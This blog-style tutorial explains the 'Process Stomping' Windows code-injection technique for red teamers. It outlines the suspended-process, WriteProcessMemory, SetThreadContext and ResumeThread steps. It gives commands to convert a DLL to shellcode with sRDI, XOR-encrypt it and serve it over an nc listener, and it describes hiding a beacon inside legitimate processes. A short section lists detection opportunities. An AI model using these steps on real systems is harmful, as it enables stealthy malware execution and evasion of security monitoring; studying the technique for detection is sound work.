Process Stomping - Stealthy Code Injection Technique for Payload Execution

Process Stomping - Stealthy Code Injection Technique for Payload Execution

Process Stomping is a stealthy code injection technique derived from hasherezade’s Process Overwriting.

Unlike its predecessor, it injects shellcode into a targeted section of a process instead of overwriting the entire process memory with a Portable Executable (PE) payload. This makes it more efficient and harder to detect.

What is Process Stomping?

Process Stomping involves injecting malicious shellcode into a specific section of a target process, allowing attackers to execute their payload while avoiding the red flags associated with traditional injection methods. This technique leverages the following key steps:

  1. CreateProcess: The target process is created in a suspended state using the CREATE_SUSPENDED flag (0x00000004). This ensures the process does not execute immediately.

  2. WriteProcessMemory: Malicious shellcode is written into the target process's memory section.

  3. SetThreadContext: The entry point of the suspended thread is redirected to the newly injected shellcode.

  4. ResumeThread: The suspended thread is resumed, executing the injected shellcode.

How It Works

Here’s an outline of how to implement Process Stomping:

  1. Select Target Process:

    • Identify the process you want to inject into and modify global variables in ProcessStomping.cpp accordingly.

  2. Prepare Payload:

    • Compile your payload using tools like sRDI (Shellcode Reflective DLL Injection). For example:

python .\lib\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll

  • XOR encrypt the shellcode for added obfuscation:

python xor.py noRLx86.bin noRLx86_enc.bin Bangarang

  1. Deliver Payload:

    • Use a simple socket to deliver the encrypted shellcode:

nc -vv -l -k -p 8000 -w 30 < noRLx86_enc.bin

  1. Inject Shellcode:

    • Use WriteProcessMemory to write the shellcode into the target process’s memory.

    • Redirect execution flow using SetThreadContext.

  2. Execute Payload:

    • Resume the thread using ResumeThread, which executes the injected payload.

Example Application

A common use case for Process Stomping is loading a beacon DLL into an executable's RWX (Read-Write-Execute) section using sRDI. This allows attackers to run malicious code while blending in with legitimate processes.

Detection Opportunities

While Process Stomping is stealthier than traditional injection techniques, it still leaves traces that can be monitored:

  • Suspicious API Calls: The combination of CreateProcess (suspended), WriteProcessMemory, SetThreadContext, and ResumeThread in quick succession may trigger alerts.

  • Behavioral Analysis: Security solutions can flag processes exhibiting unusual memory modifications or entry point changes.

Caveats

  • Selecting an appropriate target process is critical for successful execution.

  • Ensure that your DLL payload does not include a User Defined Reflective Loader, as this could interfere with execution.

Disclaimer

This guide is for educational purposes only. Neither the author nor contributors are responsible for any misuse of this information.

Credits

This technique builds upon concepts shared by Aleksandra Doniec (@hasherezade) and Nick Landers, whose work has significantly contributed to understanding advanced code injection methods.

By following this guide, security researchers and red teamers can better understand Process Stomping and its implications in modern cybersecurity. You can learn more and Download Process Stomping in GitHub.

Upgrade Your Cybersecurity Skills EHA: Learn 150+ Practical Cyber Security Courses Online With Life Time Access - Enroll Here

Back to blog